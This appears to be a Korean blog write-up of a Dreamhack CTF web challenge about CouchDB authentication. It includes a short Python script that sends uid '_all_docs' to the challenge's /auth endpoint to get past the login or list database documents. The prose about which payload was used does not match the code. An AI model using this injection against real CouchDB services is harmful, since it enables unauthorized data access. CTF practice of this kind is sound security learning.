728x90
CouchDB : 문서기반의 데이터베이스이다. 키와 값이 하나의 쌍을 이루는 데이터를 저장하며, JSON 객체 형탱인 도쿠먼트를 저장한다.
HTTP 기반의 서버로 동작하며 REST API형식으로 HTTP메소드를 사용해 요청을 받고 처리한다.
로그인페이지에서 uid와 upw 를 입력을 해서 flag값을 없는거 같다.
소스코드를 보면 /auth에서 인증과정을 거칠때, upw값이 같으면 flag값을 출력해주는 코드이다.
즉, 계정정보를 알아야지 풀리는 문제이다.
uid에 "admin" 을 넣고 upw에 "aaa" 넣었을 때의 페이로드이다.
import requests
url = 'http://host3.dreamhack.games:11764/auth'
data = {
"uid":"_all_docs"
}
req = requests.post(url,json=data)
print(req.text)'모의해킹 > Dreamhack' 카테고리의 다른 글
| out of money [WEB LEVLE1] (0) | 2023.05.16 |
|---|---|
| type confusion [WEB LEVEL1] (0) | 2023.05.15 |
| File Vulnerability Advanced for linux [WEB LEVEL1] (0) | 2023.05.06 |
| Apache htaccess [WEB LEVEL1] (0) | 2023.05.06 |
| fly me to the moon [WEB LEVEL1] (0) | 2023.05.06 |
